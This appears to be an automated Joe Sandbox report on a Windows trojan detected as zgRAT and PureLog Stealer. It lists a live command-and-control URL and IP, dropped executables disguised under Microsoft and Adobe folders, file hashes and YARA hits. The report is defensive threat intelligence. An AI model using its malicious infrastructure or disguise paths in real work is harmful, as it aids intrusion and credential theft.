                                    NameIPActiveMaliciousAntivirus DetectionReputation
                                    048038cm.renyash.ru
                                    		104.21.38.84
                                    		truetrue
                                      		unknown

                                      Contacted URLs

                                      NameMaliciousAntivirus DetectionReputation
                                      http://048038cm.renyash.ru/pipepacketprocessGeneratordownloads.phptrue
                                      • Avira URL Cloud: malware
                                      		unknown

                                      URLs from Memory and Binaries

                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://ac.ecosia.org/autocomplete?q=ZFJ29xz0hp.46.dr, wY9uPTFJlc.46.dr, MEN9iMUhSt.46.dr, ny3b86gmHR.46.dr, hlKWGWEAdu.46.dr, vbc6stWss0.46.dr, jDfjNEWOms.46.dr, bwQGjkm5wI.46.dr, 8cwcDHU7zp.46.dr, 4tY2I0JyeN.46.dr, hi1VUgBky6.46.dr, IEayz3YRRP.46.drfalse
                                        		high
                                        https://g.live.com/odclientsettings/Prod.C:svchost.exe, 00000032.00000003.1990825251.0000024CA640E000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://duckduckgo.com/chrome_newtabZFJ29xz0hp.46.dr, wY9uPTFJlc.46.dr, MEN9iMUhSt.46.dr, ny3b86gmHR.46.dr, hlKWGWEAdu.46.dr, vbc6stWss0.46.dr, jDfjNEWOms.46.dr, bwQGjkm5wI.46.dr, 8cwcDHU7zp.46.dr, 4tY2I0JyeN.46.dr, hi1VUgBky6.46.dr, IEayz3YRRP.46.drfalse
                                            		high
                                            https://duckduckgo.com/ac/?q=ZFJ29xz0hp.46.dr, wY9uPTFJlc.46.dr, MEN9iMUhSt.46.dr, ny3b86gmHR.46.dr, hlKWGWEAdu.46.dr, vbc6stWss0.46.dr, jDfjNEWOms.46.dr, bwQGjkm5wI.46.dr, 8cwcDHU7zp.46.dr, 4tY2I0JyeN.46.dr, hi1VUgBky6.46.dr, IEayz3YRRP.46.drfalse
                                              		high
                                              https://www.google.com/images/branding/product/ico/googleg_lodp.icoZFJ29xz0hp.46.dr, wY9uPTFJlc.46.dr, MEN9iMUhSt.46.dr, ny3b86gmHR.46.dr, hlKWGWEAdu.46.dr, vbc6stWss0.46.dr, jDfjNEWOms.46.dr, bwQGjkm5wI.46.dr, 8cwcDHU7zp.46.dr, 4tY2I0JyeN.46.dr, hi1VUgBky6.46.dr, IEayz3YRRP.46.drfalse
                                                		high
                                                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000024.00000002.2112170584.0000025DD8A46000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000005.00000002.2041086006.0000026E82976000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2135632693.000002CDC6646000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2202737559.00000250B3E76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1972511544.0000017106117000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2120399113.000001CB20076000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2112174865.0000016F53D66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2271768418.0000022A47676000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2211838897.00000153B05B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2174593957.000002485ED16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1977884967.0000028C80226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2144215284.0000015F57F18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2203594616.000002544D4F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1981281696.000001B980226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2017656975.000001B4CE958000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2084580351.00000244BCCD8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.1965392559.0000013C907A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.1985502120.0000028000226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2112170584.0000025DD8A46000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000024.00000002.2112170584.0000025DD8A46000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchZFJ29xz0hp.46.dr, wY9uPTFJlc.46.dr, MEN9iMUhSt.46.dr, ny3b86gmHR.46.dr, hlKWGWEAdu.46.dr, vbc6stWss0.46.dr, jDfjNEWOms.46.dr, bwQGjkm5wI.46.dr, 8cwcDHU7zp.46.dr, 4tY2I0JyeN.46.dr, hi1VUgBky6.46.dr, IEayz3YRRP.46.drfalse
                                                        		high
                                                        http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000005.00000002.2041086006.0000026E82976000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2135632693.000002CDC6646000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2202737559.00000250B3E76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1972511544.0000017106117000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2120399113.000001CB20076000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2112174865.0000016F53D66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2271768418.0000022A47676000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2211838897.00000153B05B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2174593957.000002485ED16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1977884967.0000028C80226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2144215284.0000015F57F18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2203594616.000002544D4F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1981281696.000001B980226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2017656975.000001B4CE958000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2084580351.00000244BCCD8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.1965392559.0000013C907A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.1985502120.0000028000226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2112170584.0000025DD8A46000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=ZFJ29xz0hp.46.dr, wY9uPTFJlc.46.dr, MEN9iMUhSt.46.dr, ny3b86gmHR.46.dr, hlKWGWEAdu.46.dr, vbc6stWss0.46.dr, jDfjNEWOms.46.dr, bwQGjkm5wI.46.dr, 8cwcDHU7zp.46.dr, 4tY2I0JyeN.46.dr, hi1VUgBky6.46.dr, IEayz3YRRP.46.drfalse
                                                            		high
                                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=ZFJ29xz0hp.46.dr, wY9uPTFJlc.46.dr, MEN9iMUhSt.46.dr, ny3b86gmHR.46.dr, hlKWGWEAdu.46.dr, vbc6stWss0.46.dr, jDfjNEWOms.46.dr, bwQGjkm5wI.46.dr, 8cwcDHU7zp.46.dr, 4tY2I0JyeN.46.dr, hi1VUgBky6.46.dr, IEayz3YRRP.46.drfalse
                                                              		high
                                                              https://aka.ms/pscore68powershell.exe, 00000005.00000002.2041086006.0000026E82751000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2135632693.000002CDC6421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2202737559.00000250B3C51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1972511544.0000017105EF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2120399113.000001CB1FE51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2112174865.0000016F53B41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2271768418.0000022A47451000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2211838897.00000153B0391000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2174593957.000002485EAF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1977884967.0000028C80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2144215284.0000015F57CF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2203594616.000002544D281000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1981281696.000001B980001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2017656975.000001B4CE731000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2084580351.00000244BC9F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.1965392559.0000013C90581000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.1985502120.0000028000001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2112170584.0000025DD8832000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://www.ecosia.org/newtab/ZFJ29xz0hp.46.dr, wY9uPTFJlc.46.dr, MEN9iMUhSt.46.dr, ny3b86gmHR.46.dr, hlKWGWEAdu.46.dr, vbc6stWss0.46.dr, jDfjNEWOms.46.dr, bwQGjkm5wI.46.dr, 8cwcDHU7zp.46.dr, 4tY2I0JyeN.46.dr, hi1VUgBky6.46.dr, IEayz3YRRP.46.drfalse
                                                                  		high
                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameHyperPortContainerproviderinto.exe, 00000004.00000002.1752671075.0000000002F47000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2041086006.0000026E82751000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2135632693.000002CDC6421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2202737559.00000250B3C51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1972511544.0000017105EF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2120399113.000001CB1FE51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2112174865.0000016F53B41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2271768418.0000022A47451000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2211838897.00000153B0391000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2174593957.000002485EAF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1977884967.0000028C80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2144215284.0000015F57CF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2203594616.000002544D281000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1981281696.000001B980001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2017656975.000001B4CE731000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2084580351.00000244BC9F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.1965392559.0000013C90581000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.1985502120.0000028000001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2112170584.0000025DD8832000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=ZFJ29xz0hp.46.dr, wY9uPTFJlc.46.dr, MEN9iMUhSt.46.dr, ny3b86gmHR.46.dr, hlKWGWEAdu.46.dr, vbc6stWss0.46.dr, jDfjNEWOms.46.dr, bwQGjkm5wI.46.dr, 8cwcDHU7zp.46.dr, 4tY2I0JyeN.46.dr, hi1VUgBky6.46.dr, IEayz3YRRP.46.drfalse
                                                                      		high
                                                                      https://github.com/Pester/Pesterpowershell.exe, 00000024.00000002.2112170584.0000025DD8A46000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high

                                                                        World Map of Contacted IPs

                                                                        • No. of IPs < 25%
                                                                        • 25% < No. of IPs < 50%
                                                                        • 50% < No. of IPs < 75%
                                                                        • 75% < No. of IPs

                                                                        Public IPs

                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                        104.21.38.84
                                                                        		048038cm.renyash.ruUnited States
                                                                        		13335CLOUDFLARENETUStrue

                                                                        Private

                                                                        IP
                                                                        127.0.0.1

                                                                        General Information

                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                        Analysis ID:1581724
                                                                        Start date and time:2024-12-28 20:41:08 +01:00
                                                                        Joe Sandbox product:CloudBasic
                                                                        Overall analysis duration:0h 10m 57s
                                                                        Hypervisor based Inspection enabled:false
                                                                        Report type:full
                                                                        Cookbook file name:default.jbs
                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                        Number of analysed new started processes analysed:52
                                                                        Number of new started drivers analysed:0
                                                                        Number of existing processes analysed:0
                                                                        Number of existing drivers analysed:0
                                                                        Number of injected processes analysed:0
                                                                        Technologies:
                                                                        • HCA enabled
                                                                        • EGA enabled
                                                                        • AMSI enabled
                                                                        Analysis Mode:default
                                                                        Analysis stop reason:Timeout
                                                                        Sample name:ZZ2sTsJFrt.exe
                                                                        renamed because original name is a hash value
                                                                        Original Sample Name:403138422d8da9fdd31fe147959a1403.exe
                                                                        Detection:MAL
                                                                        Classification:mal100.troj.spyw.expl.evad.winEXE@74/341@2/2
                                                                        EGA Information:
                                                                        • Successful, ratio: 50%
                                                                        HCA Information:
                                                                        • Successful, ratio: 62%
                                                                        • Number of executed functions: 210
                                                                        • Number of non-executed functions: 94
                                                                        Cookbook Comments:
                                                                        • Found application associated with file extension: .exe

                                                                        Warnings

                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                        • Excluded IPs from analysis (whitelisted): 23.218.208.109, 172.202.163.200, 13.107.246.63
                                                                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
                                                                        • Execution Graph export aborted for target HyperPortContainerproviderinto.exe, PID 3168 because it is empty
                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                        • Report size getting too big, too many NtCreateFile calls found.
                                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                                        • Report size getting too big, too many NtOpenFile calls found.
                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                        • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                        Simulations

                                                                        Behavior and APIs

                                                                        TimeTypeDescription
                                                                        14:42:10API Interceptor418x Sleep call for process: powershell.exe modified
                                                                        14:42:31API Interceptor1951933x Sleep call for process: dasHost.exe modified
                                                                        14:42:32API Interceptor2x Sleep call for process: svchost.exe modified

                                                                        Joe Sandbox View / Context

                                                                        IPs

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        104.21.38.8467VB5TS184.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                        • 649521cm.renyash.ru/PipeToJavascriptRequestpollcpubasetestprivateTemp.php
                                                                        gkcQYEdJSO.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                        • 749858cm.renyash.ru/javascriptrequestApiBasePrivate.php

                                                                        Domains

                                                                        No context

                                                                        ASNs

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        CLOUDFLARENETUSFB.htmlGet hashmaliciousUnknownBrowse
                                                                        • 104.17.25.14
                                                                        http://prowebideas.com/dsfdgfhgdfsdfdgfhgdrwet/gdfsdfdgfhgfgdfsdfdgfh/gfsdfdgfhgfgdfsdfdgfhgdfsdfdgfhGet hashmaliciousUnknownBrowse
                                                                        • 104.26.9.163
                                                                        http://track.rbfcu.org/y.z?l=https://google.com/amp/s/t.ly/5SpZS&r=14387614172&d=18473&p=2&t=hGet hashmaliciousHTMLPhisherBrowse
                                                                        • 104.17.25.14
                                                                        Set-up.exeGet hashmaliciousLummaCBrowse
                                                                        • 104.21.87.112
                                                                        test5.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                                                        • 104.21.34.5
                                                                        iien1HBbB3.exeGet hashmaliciousLummaCBrowse
                                                                        • 104.21.66.86
                                                                        SgMuuLxOCJ.exeGet hashmaliciousLummaCBrowse
                                                                        • 104.21.2.51
                                                                        oe9KS7ZHUc.exeGet hashmaliciousLummaCBrowse
                                                                        • 104.21.66.86
                                                                        MPgkx6bQIQ.exeGet hashmaliciousLummaCBrowse
                                                                        • 172.67.157.254
                                                                        l0zocrLiVW.exeGet hashmaliciousLummaCBrowse
                                                                        • 172.67.157.254

                                                                        JA3 Fingerprints

                                                                        No context

                                                                        Dropped Files

                                                                        No context

                                                                        Created / dropped Files

                                                                        C:\Program Files (x86)\Common Files\Microsoft Shared\21b1a557fd31cc

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):157
                                                                        Entropy (8bit):5.6554762689191875
                                                                        Encrypted:false
                                                                        SSDEEP:3:+RwATUvCbWEYlDpsXrnILTS1TH0hevXrX8aVCtPGU2o2QE4DmTTu0Gxq:Q+3Dp6u+TlzbzlQEzTu0t
                                                                        MD5:7736855EB89CA610A8422FB1184E316D
                                                                        SHA1:DE8F682681805F0C970EB41881728AB250DE0BBA
                                                                        SHA-256:F4A39ABE814D14166BBE7F5DEF37DFED3F17E0E5DA0D08DB5D728C0B74E9D24E
                                                                        SHA-512:33F291ECED545CC723390007F3AD00DF56C2C266D3B417C42A4D77AEB616275DB4F5596139F5F1C2660F933342292E1D128D7CBDE60132162D8375645C3DDF34
                                                                        Malicious:false
                                                                        Preview:47f0IanURYdhF01tUMRFkkkV2n3h8YQDPJigLsNPxtEYRrpyJY4KzbiUXK8fhGV2HaS5RVim8CS0fMDK7EXkeFNykOIBtssrYLQ0ZugyzSMwIsyKGxhcsvYBMdUDMh2QTlcU5MvNiiuL3ap2a846KQ8mxOo5Z

                                                                        C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):2008064
                                                                        Entropy (8bit):7.561218073847526
                                                                        Encrypted:false
                                                                        SSDEEP:49152:4Zxl12Ref9smYan+7TzjNWScGYDe9eq97DUczT:4DzKehnMhtXY6rZYc
                                                                        MD5:34EAB3FCCF84F6B9ABF20B49DB5FCF6E
                                                                        SHA1:BEF38B623BB9C1A88367325E54A759E37DC49A13
                                                                        SHA-256:48DD9601F2067474FA2CB66FE39798B6FE5AB41A51104E2A40247E473B082C2B
                                                                        SHA-512:4666A96BA8CAF17CD00CD8A54949457371013C5B864EB4394AA80A240A8EBC53855A04AD1D5477AA3BC3AAF8010F9B7AFE8A9E5302D6A21DD49944DAE0D36588
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe, Author: Joe Security
                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe, Author: Joe Security
                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe, Author: Joe Security
                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe, Author: Joe Security
                                                                        Antivirus:
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        • Antivirus: ReversingLabs, Detection: 83%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....uig................................ ........@.. ....................................@.....................................K....... ............................................................................ ............... ..H............text........ ...................... ..`.rsrc... ...........................@....reloc..............................@..B.......................H...........`...........$................................................0..........(.... ........8........E....*...........9...8%...*(.... ....~....{....9....& ....8....(.... ....8....(.... ....~....{}...:....& ....8........0.......... ........8........E....d...................8_...~....:.... ....~....{....:....& ....8....~....(U... .... .... ....s....~....(Y....... ....8.......... ....~....{....:i...& ....8^...r...ps....z*....~....(]...~....(a... ....?.... ....~....{a...9..

                                                                        C:\Program Files (x86)\Windows Sidebar\Gadgets\AaHCyFZRuOMjGDqdgJ.exe

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):2008064
                                                                        Entropy (8bit):7.561218073847526
                                                                        Encrypted:false
                                                                        SSDEEP:49152:4Zxl12Ref9smYan+7TzjNWScGYDe9eq97DUczT:4DzKehnMhtXY6rZYc
                                                                        MD5:34EAB3FCCF84F6B9ABF20B49DB5FCF6E
                                                                        SHA1:BEF38B623BB9C1A88367325E54A759E37DC49A13
                                                                        SHA-256:48DD9601F2067474FA2CB66FE39798B6FE5AB41A51104E2A40247E473B082C2B
                                                                        SHA-512:4666A96BA8CAF17CD00CD8A54949457371013C5B864EB4394AA80A240A8EBC53855A04AD1D5477AA3BC3AAF8010F9B7AFE8A9E5302D6A21DD49944DAE0D36588
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\AaHCyFZRuOMjGDqdgJ.exe, Author: Joe Security
                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\AaHCyFZRuOMjGDqdgJ.exe, Author: Joe Security
                                                                        Antivirus:
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        • Antivirus: ReversingLabs, Detection: 83%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....uig................................ ........@.. ....................................@.....................................K....... ............................................................................ ............... ..H............text........ ...................... ..`.rsrc... ...........................@....reloc..............................@..B.......................H...........`...........$................................................0..........(.... ........8........E....*...........9...8%...*(.... ....~....{....9....& ....8....(.... ....8....(.... ....~....{}...:....& ....8........0.......... ........8........E....d...................8_...~....:.... ....~....{....:....& ....8....~....(U... .... .... ....s....~....(Y....... ....8.......... ....~....{....:i...& ....8^...r...ps....z*....~....(]...~....(a... ....?.... ....~....{a...9..

                                                                        C:\Program Files (x86)\Windows Sidebar\Gadgets\dd5be8a07a6153

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe
                                                                        File Type:ASCII text, with very long lines (547), with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):547
                                                                        Entropy (8bit):5.8771622675901565
                                                                        Encrypted:false
                                                                        SSDEEP:12:ic2l55Sx1ouUoM0pw+Yzww512ovSC/PiCmpa30A3Cr2NhMZUmUkRQvlWV:F2X5Sx1hw+Yzw4dvx6pa3g2LEUmUhtS
                                                                        MD5:58A3385190DC3E4A54D36EAF62D69108
                                                                        SHA1:FB3D784EE2A7067046D4E76202DB73AB4012750F
                                                                        SHA-256:421BD428647BF2D36CEC4C07DEEC2FFC7ED2ADFA3045CA67B3E5F0F444F82809
                                                                        SHA-512:A4D9CDA64BAF2D81EFEEDE95BF6550A9BB9856340D15CAC581D3A1C48E3F1B0BC01288EEE5EC3EF02F2C556ECA63E11AA4224B68C563464F65FDF478FDCB4A74
                                                                        Malicious:false
                                                                        Preview:PdP3BT3JBMIvxcmOm5FDmzgqizxE6bv77Im6tB40WykkG2I70Xqe0Z4Z7iULfyMjbKypzqfkAOryP6kqr0OjvRHiNM9KrtUhlBJ6DdHJ2FdlrGKA8nepknyKCPbmrU3R3KMOwonOsEqqxg0GC8MEOp68M93yBfciLLrh46OUAP6f7HWgYUksHzCONOBxuzNNlHemyTMFu2E9taAFnWZq4uaWIdUp5ajLCs4zntsFHf8PvDfwN5KYZgT1rHdV8gJTT26AgLc3oTiZvLlE7ic9QKvgZCHfPWGkVo62HePCdQtG74FggZXaEJCIHaldD6nRM7DHOt7cSZg9apie7l908qgLlxuq3w9gnc3A08Rwb5IpnDrc2Ggb7wTgb1fb8QjgaAW8vhn8UMYDh0iiGSyxQhi0IWi9d0xLWmOnqsqUchHvXP8kT6VqcvP2bgzY9ofdYNr5m52XldUsaxc2Y7qgfHskWWLJ2RVyBnWJiD8XD7E8bhcoD6AB888RfGiPtseUIgrwbSUU9SchCuIz4hG5QTzCoEobesnVcu0

                                                                        C:\Program Files\Adobe\Acrobat DC\Acrobat\AaHCyFZRuOMjGDqdgJ.exe

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):2008064
                                                                        Entropy (8bit):7.561218073847526
                                                                        Encrypted:false
                                                                        SSDEEP:49152:4Zxl12Ref9smYan+7TzjNWScGYDe9eq97DUczT:4DzKehnMhtXY6rZYc
                                                                        MD5:34EAB3FCCF84F6B9ABF20B49DB5FCF6E
                                                                        SHA1:BEF38B623BB9C1A88367325E54A759E37DC49A13
                                                                        SHA-256:48DD9601F2067474FA2CB66FE39798B6FE5AB41A51104E2A40247E473B082C2B
                                                                        SHA-512:4666A96BA8CAF17CD00CD8A54949457371013C5B864EB4394AA80A240A8EBC53855A04AD1D5477AA3BC3AAF8010F9B7AFE8A9E5302D6A21DD49944DAE0D36588
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 83%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....uig................................ ........@.. ....................................@.....................................K....... ............................................................................ ............... ..H............text........ ...................... ..`.rsrc... ...........................@....reloc..............................@..B.......................H...........`...........$................................................0..........(.... ........8........E....*...........9...8%...*(.... ....~....{....9....& ....8....(.... ....8....(.... ....~....{}...:....& ....8........0.......... ........8........E....d...................8_...~....:.... ....~....{....:....& ....8....~....(U... .... .... ....s....~....(Y....... ....8.......... ....~....{....:i...& ....8^...r...ps....z*....~....(]...~....(a... ....?.... ....~....{a...9..

                                                                        C:\Program Files\Adobe\Acrobat DC\Acrobat\dd5be8a07a6153

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):251
                                                                        Entropy (8bit):5.731946784895442
                                                                        Encrypted:false
                                                                        SSDEEP:6:Swvk1qCrsCppLnSYDyodnlgT0/uQGlEw+R6cjTpb:Rv4qCrDlOzYmCw+oSTF
                                                                        MD5:AF3B832704749A8B7337BDADF3EC0DE2
                                                                        SHA1:C513DF0B954000FE0AF3558048218C862D064397
                                                                        SHA-256:78DC85B6FA21E8CF276D8475FDD456E7869AA7DF537FAA3E101327D153ED2FCB
